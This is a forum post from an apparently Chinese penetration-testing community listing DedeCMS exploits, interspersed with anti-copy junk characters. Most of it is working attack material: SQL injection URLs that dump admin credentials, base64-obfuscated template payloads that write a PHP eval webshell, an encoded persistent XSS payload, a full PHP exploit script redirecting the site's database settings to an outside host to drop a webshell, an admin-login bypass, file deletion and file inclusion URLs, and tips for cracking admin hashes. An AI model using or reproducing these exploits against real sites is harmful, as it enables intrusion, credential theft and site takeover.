中国网络渗透测试联盟

标题: dedecms漏洞总结 [打印本页]
作者: admin    时间: 2012-10-18 10:42
标题: dedecms漏洞总结
1 m8 H, ~+ g! h7 I: s% V. [
Dedecms 5.6 rss注入漏洞
% Y9 p: F- p# R3 a. M3 @  ?http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
* T+ S: ]6 I4 t7 c3 J3 e
6 M9 V3 A( R  B3 S6 w% n6 C' M2 S6 a8 e) Q

, E/ N: p, n( h1 V8 ^! f1 G' S' }% Q; F" u$ k, ]! a7 B

; `& q' s$ X9 L7 `9 r7 M% l7 O: I0 U' ~4 l0 a3 h

7 I1 o2 y5 |, e0 I1 \: R( U5 G) Q# C4 t2 S+ b
DedeCms v5.6 嵌入恶意代码执行漏洞; g% X. \# d0 ?* p( L1 T" k
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}0 k1 o6 {' @4 x/ t0 {' ~
发表后查看或修改即可执行8 g# J7 s9 r! d" K* U# C2 d4 A
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
* G  E+ z/ G9 B& C2 |生成x.php 密码xiao,直接生成一句话。
9 x' y, s4 r/ a) q; l, O* E3 m1 R: U  J/ n& h

5 Y0 \' ]# b4 Q2 j9 n
9 g. |$ W5 u+ N; }( r; q1 w, \/ t0 y! z& o1 j
" ~& V- k( z( \% c& S3 s

8 j# W% W+ Y$ H( {( M
# l0 j5 Z' U1 `( O7 w6 f6 n/ l) z' y$ O
Dede 5.6 GBK SQL注入漏洞
. r3 ?' }) {( N0 O6 chttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
% U0 ^8 V: j2 M$ J3 l" e! j& nhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
$ r% r! [6 [6 S% I7 o, K5 i$ Phttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
) q( R9 m+ M8 t# F9 v/ f/ J" y  G1 j" J7 X0 }: r

* k. e; Z& S9 Y! ^; S0 C1 @/ I! D

* ]4 G+ i8 e$ M/ C! j/ P) {
2 @* |4 ~  ~; \1 s& F$ C& B7 [* o, v3 Z" J2 V  t

* q7 K1 X6 d9 L# I% _  p
' o% R4 o1 x" q) EDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
: u1 g* n8 h/ I  a" ^http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
. {6 G) X; X" Q: N+ V
- d2 [$ k0 Q" o8 C
0 M3 [* ~. ^! c2 _0 v  S: f4 F+ K% L- z$ r6 ]" @
# {3 Z; S& H% U$ L- }$ }4 q- j" f
! f: [6 B4 [" |* H
, X' ^/ W/ m. X% F+ v6 q9 W) g
DEDECMS 全版本 gotopage变量XSS漏洞
& x  \. F& X6 m2 q1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
. k# j) I$ }2 A: `. m& H. Zhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="" s  @: `9 `  [7 ]7 v

4 i0 G: u1 a$ h! `2 J5 u: z" h
4 j* h. ?4 N& |" H0 w2 o2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 . E/ q, I( s* `8 N  Z4 w9 F
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
6 L% L4 R0 |" K2 T0 n1 G- p' \" i2 J; r& \4 e1 }
  n- ^, \6 _; C  r, L
http://v57.demo.dedecms.com/dede/login.php/ E& L; e. c$ f: ]

9 e7 j- a/ s& m' I$ L8 |" ?. D2 q% P0 ]8 I
color=Red]DeDeCMS(织梦)变量覆盖getshell
+ ~0 i( o" I5 l! K8 _#!usr/bin/php -w
; E, c5 P  K% |. Y/ v3 s$ k3 [! W<?php0 d& K% O4 d+ ]" a% d5 ^1 b6 P
error_reporting(E_ERROR);3 z6 s; T' ^6 y- K6 p" Z# d) H( V* b
set_time_limit(0);
& F' n  h1 ^! Dprint_r('4 B  Q$ z2 z# R2 ~: N
DEDEcms Variable Coverage
% u6 Z7 v3 l, wExploit Author: www.heixiaozi.comwww.webvul.com
8 [6 c& i& @9 ]  ~! y1 g);
, c" x- i, B. Z7 Becho "\r\n";! n. Q3 a; I$ c7 a. b7 @) k: _
if($argv[2]==null){  X% [% i4 |3 W( q2 p
print_r('4 E( D7 j, [7 L4 z$ Q( @/ h
+---------------------------------------------------------------------------+7 Y% R9 S+ J$ A
Usage: php '.$argv[0].' url aid path
" z  O1 G8 Y2 Z2 jaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus// x7 z8 Q6 L' f
Example:
# O7 E* b3 f3 V* z  n" H: }, Qphp '.$argv[0].' www.site.com 1 old4 u- p) G4 e6 S, H# S$ {
+---------------------------------------------------------------------------+4 ?9 l4 B6 T, H( E, P6 j- ?) h
');0 t1 S6 a; V2 r5 O( U  @/ T! c
exit;9 L' m& D! Z. t
}
7 s; Z+ N, y/ [# g  j* H$ Q$url=$argv[1];4 D$ z0 Q+ i. b  q
$aid=$argv[2];3 D. O7 C0 {$ T& ^7 s+ a+ G
$path=$argv[3];' R. ?4 Y, H6 _' C
$exp=Getshell($url,$aid,$path);  C9 {8 T0 u0 a6 U# s$ U6 u
if (strpos($exp,"OK")>12){
. T5 X1 m6 s3 R6 j( ], cecho "3 e1 e0 j+ A) }! u! V3 f) ]2 A
Exploit Success \n";
' e5 @0 Q2 E+ e  i* rif($aid==1)echo "
8 S2 Y% g) Y* q1 L& KShell:".$url."/$path/data/cache/fuck.php\n" ;
# N/ W' L" C5 {
1 X/ Q' {* j" ?4 g$ U' M
# M0 _: d& s5 k. `if($aid==2)echo "9 ^. P; ~( n+ R) @  I7 y+ h) Q7 T( z
Shell:".$url."/$path/fuck.php\n" ;% h" o. @3 Z3 w* r: j- b! U% K

7 {6 d" l) S& }! y: v9 U/ Q5 Q% {/ H
if($aid==3)echo "5 l& p6 b1 U5 W. b) ]
Shell:".$url."/$path/plus/fuck.php\n";5 @* i, c5 C/ n  p" g0 [
6 S0 D* o2 X9 w9 L* ]- a
. E" [9 ^, c/ R7 a# u8 S
}else{4 U3 j) c  |# G6 k5 ^
echo "$ ]' `: X1 ~  E) o. r: A* ?) M
Exploit Failed \n";& K: E) W" [% c% S; Z, h6 Z' Y( ~
}. m9 P/ }+ O' P# i8 n' A2 ]  O+ I
function Getshell($url,$aid,$path){
  U5 x% e- ~" P% D- n8 x! ~( E4 W# T2 w$id=$aid;7 p5 A0 |/ K* m. e* B
$host=$url;
$ x7 V) ~- E) Q& p9 L2 B2 p$port="80";
6 x0 K( s/ a) Z+ {$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
! Q: W+ l2 Z$ Q+ ^$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";  s# J: K# `8 G+ s; \/ J
$data .= "Host: ".$host."\r\n";: N3 i1 Q" u0 k: ?
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
7 [  W: P& x) [7 O' z$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";( i# _9 y8 T4 ]
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
1 z! B' q  ]' @//$data .= "Accept-Encoding: gzip,deflate\r\n";- S# q, ?# V. Y8 J
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
, L3 k& ]& q4 [4 `( P( h: z$data .= "Connection: keep-alive\r\n";
1 ?& C5 X" j" d$ C1 `! j$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
- E4 Q% C( X" i. z) b0 J8 r$data .= "Content-Length: ".strlen($content)."\r\n\r\n";! L1 T. r* G' P3 `% Q: V* t
$data .= $content."\r\n";0 }( N! |) p5 C) J
$ock=fsockopen($host,$port);
* g. Z! G( Y* t9 z  qif (!$ock) {
* I2 R% u0 ?( P9 G9 ]echo ", N  ~0 K9 O& }8 N1 G
No response from ".$host."\n";
& d* f: @) Y  d8 `}
7 M, m- t6 @+ e( jfwrite($ock,$data);
; [. |1 K: R" F- d/ dwhile (!feof($ock)) {' t- s3 ^' r$ B. |& V& v0 L
$exp=fgets($ock, 1024);+ A: m% l& b  k. p. j
return $exp;
7 a9 W: z9 ]( }* G7 }}
$ a( t" {3 m5 q3 w. I0 M) r1 E}- K! v, [3 F' A3 p; c) ^
6 ^9 q$ W6 D. p, H6 f& S

# `2 ?! N3 |' f" {. k. d?>: S, f9 J; g4 G7 Y9 T, w9 E6 B

2 @+ t5 @, y2 I
; i2 u5 B. N# q+ R3 U3 }  G+ N' C6 F, a( a
. C/ |: I. f) q: Q
" E# l/ g5 a7 p
' H2 ?+ Q( O3 ~# N( N- Y. _0 c

( u: z0 ~' i( c: e+ I
2 E& g! l: B$ x( n& Q' @8 F4 P' I6 e* I) [0 m1 I( a# [! K+ U1 N0 {

* H* K0 H, H  ]$ I1 l9 ?$ uDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
# d: c. S0 x- A- Dhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root8 f# Z: Q6 S) P' d
" Q7 E) {+ H; m, Y5 h

* J* v# |4 b6 m- V$ v, Q/ ~+ Y" T2 ?把上面validate=dcug改为当前的验证码,即可直接进入网站后台4 I7 y) z- y8 R) [2 d! S

$ C0 X! u& a( G& G6 }4 \$ @2 I  P% ^
此漏洞的前提是必须得到后台路径才能实现+ f, r2 z, n1 a8 m0 S1 ^# M5 S) f! z$ ^

9 `) ], [" a5 W0 v- C# O% J% _# ~# [& R; \8 L2 ~
, k- J, ?6 c4 P
' G% O& Y+ J% E4 C2 ?8 G9 @/ c

2 }5 r  T& E9 i9 N/ Y, P' I1 [
6 X, N. ]' N3 u
1 u8 q/ M  p% T$ `/ |" |! |$ z3 V: U" O5 `4 r
9 M; A3 V; M+ y$ `; I
& ?3 _) i( J3 T9 w8 B" c
Dedecms织梦 标签远程文件写入漏洞
( J* B  |' a7 l' L& ~! h3 ~前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');3 |# L6 Q# n4 m/ H
) c' T4 @  v3 Y3 L! }
1 A  }" ^. X3 j, \
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
& ?6 r1 k# o+ X<form action="" method="post" name="QuickSearch" id="QuickSearch">
2 n; A) V, y( p. x3 g4 H5 `0 z<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />/ w5 F" W. ?0 Z! h0 a5 _5 x
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
2 q6 t. A' B* `6 h( I<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />9 ^( v0 u8 M' A8 S8 H1 v
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />; s9 M7 L% ^& d  E% I0 h% n* P- \! C: F1 s
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
3 @8 p& C4 \0 A: P; E* M( X<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />9 w) h" V( |% Y. p- s
<input type="text" value="true" name="nocache" style="width:400">
- G/ M9 @3 ]3 {2 v9 I<input type="submit" value="提交" name="QuickSearchBtn"><br />
% \1 g2 n# Z8 A</form>
3 U# ^4 P2 \: k<script>, Y1 R. z" z( D7 ?) [5 z( t/ B
function addaction()0 r* X- @# ?1 F# T
{8 D; V2 ?. S! m! D, X0 K
document.QuickSearch.action=document.QuickSearch.doaction.value;
$ j0 m3 `3 l3 O& ^% e# N# T}
5 g. w# I; q1 @" P: Z* C, X</script>
+ a" Y+ G. ^2 {+ K8 ^8 @* S4 Y% g7 Y; l# v* U7 i' |' p' x8 E! P$ b* j
. K. b: p" v- [' d

: s1 R- \+ U2 `5 ^( r* e! x3 m' f4 ]0 w( f, P1 f/ E2 p% `! q& S  |
* a3 A2 T8 f4 B; a) K: g
7 z9 N. o: M; `  l
9 S3 g6 g0 Z- w7 C* E% \

0 Z: _( q: F' P: N8 O" v. L: `9 h
( C: ?# y% L8 h
DedeCms v5.6 嵌入恶意代码执行漏洞
  ~! p6 C0 {) H0 ^! i注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
8 R. F' n/ @0 x: T! E1 Ya{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}8 E; o0 u9 \$ ]5 m1 @- P' f  v
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得7 |# `, K7 B8 ?& Z9 u( ~
Dedecms <= V5.6 Final模板执行漏洞) S6 z) p& B& G
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
) U6 U# S( c0 ?2 buploads/userup/2/12OMX04-15A.jpg4 {. K% S+ d) l* ~- a* V( ~3 c0 k

" e- e3 ]8 U3 O: W3 r) I) `/ y+ \
# }0 [/ G  @1 y) n$ c' t模板内容是(如果限制图片格式,加gif89a):
! V" k+ X6 v; a/ q1 C  E{dede:name runphp='yes'}
% u. I; O" h# i' w. s3 X1 B  {  v  q$fp = @fopen("1.php", 'a');
( z! v  m, @3 V' _3 q@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
6 Z7 x: H& G6 p8 {) n, ?. D@fclose($fp);
; a/ c1 q9 o6 K0 h- f! x{/dede:name}0 @9 V' ^2 `1 r: C
2 修改刚刚发表的文章,查看源文件,构造一个表单:; b" r$ E. m8 d9 k. t
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
, p" V5 ]9 a0 ~: v# d<input type="hidden" name="dopost" value="save" />  D* Q3 O2 z- h9 x
<input type="hidden" name="aid" value="2" />
# |% `: q$ g! V<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
& P6 X! R3 ~4 X8 C  F* Z) Z<input type="hidden" name="channelid" value="1" />& }( i# n7 i' T; |+ V( s& L0 R
<input type="hidden" name="oldlitpic" value="" />- r5 m+ `9 Y) z
<input type="hidden" name="sortrank" value="1275972263" />
1 S0 s4 ^4 e: A& {( L% _9 z) H! d, v
% W$ H  e1 \' @0 d7 d: U' s" j, @% B
<div id="mainCp">, ^; v+ A! c- Z' T3 B( s
<h3 class="meTitle"><strong>修改文章</strong></h3>
: x! d3 l2 O2 P: U% f. E& f+ o. r2 f
' @) u7 O) g  G4 G
<div class="postForm">
. k1 y6 ~( s0 g0 d# Y: k<label>标题:</label>0 A& H  \, y- k+ a
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
$ M, r" f+ E$ _1 i; J5 D! K3 ]
$ g- ]5 l- m1 H1 T% b9 y1 }9 B1 c' p2 V, s5 b; M7 A) d
<label>标签TAG:</label>/ u  {+ o- ?3 [# Y4 h* {- Y- k1 n
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)9 Q% G7 y/ L- d
; r+ m+ O7 l6 Z2 t9 y* W

6 G* M* n( G7 B<label>作者:</label>
  F( Z5 D9 O; ]+ K# i<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>- R6 q4 {. B# f$ i  Z
- E! r+ p; h7 k

# a6 T" {7 z' M<label>隶属栏目:</label>
# x$ y2 I& z# N+ w8 C9 q<select name='typeid' size='1'>8 N) W, A5 `  Z6 ]1 @) K- t
<option value='1' class='option3' selected=''>测试栏目</option>
& t' _6 V7 [6 H2 z9 W</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)* g' O/ M$ |8 ]2 y) \# K

8 P9 K" e8 Z$ w1 L! L. i4 f0 X+ r' a2 t$ D; [: m- Q
<label>我的分类:</label>5 ]7 |* B' |2 {$ z3 t
<select name='mtypesid' size='1'>2 U. ?: }7 s/ V+ S+ [- O; r+ ]2 j
<option value='0' selected>请选择分类...</option>
( G2 h' w% p3 T$ u9 I<option value='1' class='option3' selected>hahahha</option>/ D7 r$ }" q! e9 h0 V- U
</select>
8 E! T6 q5 q0 n( ^( P% K( q6 z1 O4 v& }$ W( ^& A8 X

+ [( H$ v. C% Z  ?# ?( k' A<label>信息摘要:</label>* T% z/ ^  b) E' |/ x6 K
<textarea name="description" id="description">1111111</textarea>
: z# T( h, g! b3 a2 E8 ~7 |* D% K8 A& s(内容的简要说明)
! n* K! e: B' N+ G4 E0 K. \2 T9 T. R! ^1 ?" U( L9 A2 G* O2 Y3 |
$ h$ Q' b5 [' [  |6 e: y4 o
<label>缩略图:</label>
! Y! O7 i  M4 X; R, }<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
9 z  x$ z8 u4 a7 _) @, R4 a' d/ r/ f
4 ~8 h3 x" X) p% Q; V/ N  D
<input type='text' name='templet'
1 p9 b2 _$ J% M5 C* ], E2 U' jvalue="../ uploads/userup/2/12OMX04-15A.jpg">
4 I" I$ D/ L6 q  z1 K& B1 u' f<input type='text' name='dede_addonfields'# P2 J; @& I( m# w2 K4 D- D" C+ Z
value="templet,htmltext;">(这里构造)* L) A5 C; g; n% M
</div>
# p* o7 \) O! E. H; G1 m' w* b( l! @4 v, ~1 w5 T
6 {0 v8 q' {+ \9 D4 M
<!-- 表单操作区域 -->/ c" h5 |) H/ l0 m# q; W: a1 L+ _
<h3 class="meTitle">详细内容</h3>
! h1 U! o6 Q4 j1 _2 m( p
1 z& v5 @" |/ k
; \+ K2 Q& I. p) ?& [% X" \  r7 r<div class="contentShow postForm">/ |5 G) T9 w- f) S% K
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>" G8 F3 b/ r9 u# `0 Z/ S

" C, F, b) E0 j2 `6 h( N( a) Z8 [9 _+ g* Y2 ?4 W0 h8 u1 f( L6 g
<label>验证码:</label>; D! |% i/ [8 M3 Q% t- O  `
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
9 }8 G  m6 g; t8 s: z<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
2 L8 e1 R1 ^, F4 K5 P. |3 e$ V2 N2 A6 v3 n. a# h
& p6 x8 f/ c  E. Y
<button class="button2" type="submit">提交</button>
2 F6 l" b6 v% W: h/ S5 I<button class="button2 ml10" type="reset">重置</button>
; X5 G1 X9 T: ~, n1 F</div>
' Z( e6 |1 Z# u' k
7 F# m7 G" Z: q
7 i+ p( \  N- t</div>
( |# d1 G6 w' H# S
8 y" }! Z4 u. Z% \+ s, Z6 F( S$ ^
: ~- M2 i, x0 V7 t</form>3 L5 ]  X; U- t' `# Q* ]/ i
+ I$ L% Z8 K4 Y6 _7 Q- ^
7 C) l( x1 P0 t7 {3 l6 C
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:6 q+ L& O7 k/ f1 Q+ ^$ g( g
假设刚刚修改的文章的aid为2,则我们只需要访问:
, V$ p& f4 g; v+ Phttp://127.0.0.1/dede/plus/view.php?aid=2' k" l- ?; m) b/ Q' B) ?: E
即可以在plus目录下生成webshell:1.php
' [1 Q! p! _: i, ^. d! q/ E+ D8 [2 Q. z; J) f  r" T+ \9 n
' `, b" r8 `- r! t9 |+ a" j
$ T2 f9 A8 I2 |4 s6 u

" [- P- Z6 r1 R8 F0 f/ B% s: z& _( S1 J" N

0 t1 r/ S5 W1 K8 Q; t
5 w& J/ A$ X' M9 N8 |: T: j9 L3 }& w" G+ \6 L

3 r: `7 t  _% _/ B: J
9 \+ A- O2 e2 L  P  i2 |% B" [9 N5 _' f3 n

9 N4 D' Q. ?, I) Y5 yDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
5 S4 i7 R7 y" a4 `/ h5 a3 F% cGif89a{dede:field name='toby57' runphp='yes'}
) p( M" A- p6 U" C$ pphpinfo();6 b! N+ B8 X- P2 U8 u
{/dede:field}
' B( A: F, W: p. _. i保存为1.gif
6 I6 d5 N% U5 p6 M& `' K# b<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> ' [% ^; ^& X/ k% F% I
<input type="hidden" name="aid" value="7" />
: x1 D- D' a0 e/ e<input type="hidden" name="mediatype" value="1" />
0 \4 ]: n7 M' ~% P8 \<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
- |" r; Y( j1 \8 x# `: ~<input type="hidden" name="dopost" value="save" /> 4 _' b6 s6 K) P2 O. V3 l! H' z0 {
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
2 I( l1 c( G1 M( y" Z<input name="addonfile" type="file" id="addonfile"/> / z+ G/ B; [1 ~. S  _  R) h
<button class="button2" type="submit" >更改</button>
8 M( @9 u! H- l$ v  T</form> ' S' B8 J1 T$ s; B8 _% n& T+ {" |) `

" t4 ^% E) C) J! K. b
8 s0 Z/ v' {# g' \* _" O; U2 n构造如上表单,上传后图片保存为/uploads/userup/3/1.gif0 h" b3 V: p; i
发表文章,然后构造修改表单如下:' a0 o! f$ b- D# S* w! M
4 E; N1 s- ]: @4 ]9 B2 [

1 r+ j. q" O- f, J9 R<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
: j4 R. Z: w3 w  {" Q( ], Z<input type="hidden" name="dopost" value="save" />
2 O0 v5 i' g, r/ f& [; \7 Y<input type="hidden" name="aid" value="2" />
9 i( \& k5 O) ?8 y$ u<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
" b2 ?/ ]8 D7 _! m& Z# u<input type="hidden" name="channelid" value="1" />
5 m" r4 \% W- a% E6 b+ x( q+ E! z<input type="hidden" name="oldlitpic" value="" />
4 e0 q' x" {' W$ g% S; o<input type="hidden" name="sortrank" value="1282049150" />
2 \2 J$ s# g( ]5 @<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 1 W. u1 _: f, R2 r+ q
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> . \6 u7 I2 ~% k, C* ]4 u
<select name='typeid' size='1'> 4 g, L9 Y( k# B' r3 j9 v" R
<option value='1' class='option3' selected=''>Test</option>   h* h8 ]! v4 v% \- U
<select name='mtypesid' size='1'>
6 f* O8 ?4 ~9 e8 b. u<option value='0' selected>请选择分类...</option> # {) P5 }2 j; S* C
<option value='1' class='option3' selected>aa</option></select>
& W' T! ]5 r9 ]# d<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
; A" N1 B1 j+ e+ V9 G<input type='hidden' name='dede_addonfields' value="templet"> : i4 C2 G$ M# ?6 h
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
( T# E* m, u% l" I3 d<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> * y" V8 R2 s# N  j5 q8 n
<button class="button2" type="submit">提交</button> : ^  t9 K, h# u  ^
</form>5 g5 `6 A, g6 L9 ~! {1 n
: v$ m6 \/ t; f( U/ d: Z4 O

& I$ `+ t' c- [6 ~
- g+ j2 o1 j3 S$ W
+ X8 T$ g$ T% Q& E0 }0 b' G
$ T# c& S( _. g$ s9 i' }( l' ~) d( v; E/ s  `% O% Z

3 t+ J" ?# m* X# _
: A% l. b! k. N7 P. H2 w- H6 k% [# o3 t# D2 K' r; \. u( k

, G' J$ ?8 w0 l% t: @+ P2 v; S6 s0 z! h0 Q% A6 s8 _6 i

- X+ s8 f# ~  q3 \1 U" u! R织梦(Dedecms)V5.6 远程文件删除漏洞
5 S7 f, a9 O9 @0 k+ B- Qhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif' R4 ?' R; t0 N6 L5 n& e

# B' O% Q; \" Y- X7 t  d
: K( O( O6 S# f( r# N; Q7 n: K+ V6 y1 T
6 U+ s( n- Q; a* x* L; O% M) A
" v2 V. h! ~+ T3 [

: }! t$ n- ]: X/ H( Y' \
0 K6 B! v  w- k: z% i' _- I; Q7 I3 N* p# O1 Z9 E9 P- a5 c

# ^9 H2 f: T; A5 y5 O9 z' \6 C6 T
1 C! `- g& t9 l$ ^. A) o织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
: D2 O1 |& v5 y2 Y/ p# H) Phttp://www.test.com/plus/carbuya ... urn&code=../../2 Z% I3 |0 ~/ o/ O$ B; Y
* R0 ^9 X- b" h( G) A* o4 u( Q
8 j, u& t- m7 V" }2 c6 `8 k

3 |3 l8 R/ L1 A: ]2 G8 K) p2 T, _8 \) D: s5 }) |8 @8 M; D, x+ f

$ _- J1 z. r1 r: n: v( M1 @* D# @" |4 W6 o. T
% `" v8 s  d. ~$ n# e
2 f0 J' {4 z( G$ J" t5 t

$ N6 p+ K3 J7 I' u* M0 u0 F+ }: \0 l; f
- ^1 u1 v( v, G3 XDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
' k2 T1 ?7 g, w1 `( Xplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`+ j9 ]4 u, s: E$ }6 ~# p
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
* Z2 [4 c! G" U" k+ K
; u4 i0 j; o/ l5 ?0 r  Q+ I" ~( R' ^1 G+ q2 r

$ g6 Z* y( ]7 N. o* M% N1 ~0 ~/ x1 c* {8 H" D# x
  f9 L9 E0 ]8 o' K$ q) e
) q' X* J2 C) L1 W: s& o% b

4 L, j% z0 {2 a" X( A% U1 F
! r) B2 L- W- _) |- R9 p
8 A1 h) e- Z3 x5 K8 X) V5 W3 s/ ~! R) B& `9 z
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞; ]( l8 i* K4 F' Z5 s4 h
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='9 f# f& }" G# z/ w1 j
/ A8 V; S( ~+ N0 b# p/ E
